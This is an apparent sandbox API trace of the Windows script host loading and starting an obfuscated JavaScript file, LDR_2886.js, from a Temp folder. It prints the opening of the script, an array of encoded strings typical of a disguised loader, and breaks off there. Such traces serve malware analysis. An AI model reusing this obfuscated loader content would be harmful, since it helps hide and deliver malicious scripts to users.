	[0045.193] CoCreateInstance (in: rclsid=0x7fee3375d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee3375d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xd6af0 | out: ppv=0xd6af0*=0x4275b0) returned 0x0
	[0045.193] IUnknown:AddRef (This=0x4275b0) returned 0x2
	[0045.193] GetCurrentProcessId () returned 0xb58
	[0045.193] GetCurrentThreadId () returned 0xb5c
	[0045.193] GetTickCount () returned 0x1cbf5
	[0045.193] ISystemDebugEventFire:BeginSession (This=0x4275b0, guidSourceID=0x7fee3375da8, strSessionName="JScript:00002904:00002908:18117749") returned 0x0
	[0045.193] GetCurrentThreadId () returned 0xb5c
	[0045.193] ??2@YAPEAX_K@Z () returned 0xd71e0
	[0045.193] ??2@YAPEAX_K@Z () returned 0xd7230
	[0045.193] malloc (_Size=0x80) returned 0xd72e0
	[0045.193] malloc (_Size=0x108) returned 0xd7370
	[0045.193] GetTickCount () returned 0x1cbf5
	[0045.193] GetCurrentThreadId () returned 0xb5c
	[0045.193] ??2@YAPEAX_K@Z () returned 0xd7480
	[0045.193] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0045.194] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0045.194] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0045.194] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x120000
	[0045.194] GetVersionExA (in: lpVersionInformation=0x25f010*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x25f010*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0045.194] IsTextUnicode (in: lpv=0x120000, iSize=19304, lpiResult=0x25f000 | out: lpiResult=0x25f000) returned 0
	[0045.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x120000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0045.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x120000, cbMultiByte=19304, lpWideCharStr=0x42f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0045.195] UnmapViewOfFile (lpBaseAddress=0x120000) returned 1
	[0045.195] CloseHandle (hObject=0x114) returned 1
	[0045.195] CloseHandle (hObject=0x110) returned 1
	[0045.195] GetSystemDirectoryA (in: lpBuffer=0x25f088, uSize=0x0 | out: lpBuffer="\xcc\xf4\x25") returned 0x14
	[0045.195] ??2@YAPEAX_K@Z () returned 0xd74d0
	[0045.195] GetSystemDirectoryA (in: lpBuffer=0xd74d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.195] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0045.195] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0045.195] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0045.195] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0045.195] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0045.196] IdentifyCodeAuthzLevelW () returned 0x1
	[0046.264] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25e200 | out: lpSystemTimeAsFileTime=0x25e200*(dwLowDateTime=0x94e70e70, dwHighDateTime=0x1d543d1)) 
	[0046.264] GetCurrentProcessId () returned 0xb58
	[0046.264] GetCurrentThreadId () returned 0xb5c
	[0046.264] GetTickCount () returned 0x1cd0e
	[0046.264] QueryPerformanceCounter (in: lpPerformanceCount=0x25e208 | out: lpPerformanceCount=0x25e208*=17068980236) returned 1
	[0046.264] malloc (_Size=0x100) returned 0xd7e40
	[0046.264] GetVersionExA (in: lpVersionInformation=0x25dfe0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe32bf810, dwBuildNumber=0x7fe, dwPlatformId=0xe32b0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x25dfe0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0046.264] GetUserDefaultLCID () returned 0x409
	[0046.265] IsFileSupportedName () returned 0x1
	[0046.265] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0046.265] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0046.265] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0046.270] GetSignedDataMsg () returned 0x0
	[0046.270] GetCurrentProcess () returned 0xffffffffffffffff
	[0046.270] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x25e840, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x25e840*=0x140) returned 1
	[0046.270] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0046.270] ??2@YAPEAX_K@Z () returned 0xda4f0
	[0046.270] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0046.270] ReadFile (in: hFile=0x140, lpBuffer=0xda4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x25e820, lpOverlapped=0x0 | out: lpBuffer=0xda4f0*, lpNumberOfBytesRead=0x25e820*=0x4b68, lpOverlapped=0x0) returned 1
	[0046.270] CoInitialize (pvReserved=0x0) returned 0x1
	[0046.270] CoCreateInstance (in: rclsid=0x7fee32bf850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee32bf860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x25e790 | out: ppv=0x25e790*=0xdf4c0) returned 0x0
	[0046.417] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25c990 | out: lpSystemTimeAsFileTime=0x25c990*(dwLowDateTime=0x94f093f0, dwHighDateTime=0x1d543d1)) 
	[0046.417] GetCurrentProcessId () returned 0xb58
	[0046.417] GetCurrentThreadId () returned 0xb5c
	[0046.417] GetTickCount () returned 0x1cd4c
	[0046.417] QueryPerformanceCounter (in: lpPerformanceCount=0x25c998 | out: lpPerformanceCount=0x25c998*=17084286444) returned 1
	[0046.417] malloc (_Size=0x100) returned 0xd7f50
	[0046.417] __dllonexit () returned 0x7fee31d14c0
	[0046.417] __dllonexit () returned 0x7fee31d14e8
	[0046.417] GetVersionExA (in: lpVersionInformation=0x25c770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xe31d2dc9, dwBuildNumber=0x7fe, dwPlatformId=0xe31d14e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x25c770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0046.417] GetProcessWindowStation () returned 0x30
	[0046.417] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x25c758, nLength=0xc, lpnLengthNeeded=0x25c750 | out: pvInfo=0x25c758, lpnLengthNeeded=0x25c750) returned 1
	[0046.417] ??2@YAPEAX_K@Z () returned 0xdf060
	[0046.417] ??2@YAPEAX_K@Z () returned 0xdf0b0
	[0046.417] ??2@YAPEAX_K@Z () returned 0xdf0e0
	[0046.417] ??2@YAPEAX_K@Z () returned 0xdf120
	[0046.417] ??2@YAPEAX_K@Z () returned 0xdf160
	[0046.417] ??2@YAPEAX_K@Z () returned 0xdf1a0
	[0046.417] ??2@YAPEAX_K@Z () returned 0xdf1e0
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf220
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf260
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf2a0
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf2e0
	[0046.418] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf330
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf370
	[0046.418] DllGetClassObject (in: rclsid=0x42e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25d460 | out: ppv=0x25d460*=0xdf0b0) returned 0x0
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf0b0
	[0046.418] IClassFactory:CreateInstance (in: This=0xdf0b0, pUnkOuter=0x0, riid=0x25e240*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x25d480 | out: ppvObject=0x25d480*=0xdf4c0) returned 0x0
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf3b0
	[0046.418] GetSystemInfo (in: lpSystemInfo=0x25d2c0 | out: lpSystemInfo=0x25d2c0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0046.418] VirtualQuery (in: lpAddress=0x25d330, lpBuffer=0x25d2f0, dwLength=0x30 | out: lpBuffer=0x25d2f0*(BaseAddress=0x25d000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf3f0
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf410
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf470
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf4a0
	[0046.418] ??2@YAPEAX_K@Z () returned 0xdf550
	[0046.419] IUnknown:AddRef (This=0xdf4c0) returned 0x2
	[0046.419] IUnknown:Release (This=0xdf4c0) returned 0x1
	[0046.419] IUnknown:Release (This=0xdf0b0) returned 0x0
	[0046.419] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.419] IUnknown:QueryInterface (in: This=0xdf4c0, riid=0x7fee32bf860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x25e6c8 | out: ppvObject=0x25e6c8*=0xdf4c0) returned 0x0
	[0046.419] IUnknown:Release (This=0xdf4c0) returned 0x1
	[0046.419] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0046.419] IsTextUnicode (in: lpv=0xda4f0, iSize=19304, lpiResult=0x25e718 | out: lpiResult=0x25e718) returned 0
	[0046.420] GetACP () returned 0x4e4
	[0046.420] malloc (_Size=0x97d0) returned 0x26dfd0
	[0046.420] GetACP () returned 0x4e4
	[0046.420] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xda4f0, cbMultiByte=19304, lpWideCharStr=0x26dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8Kfe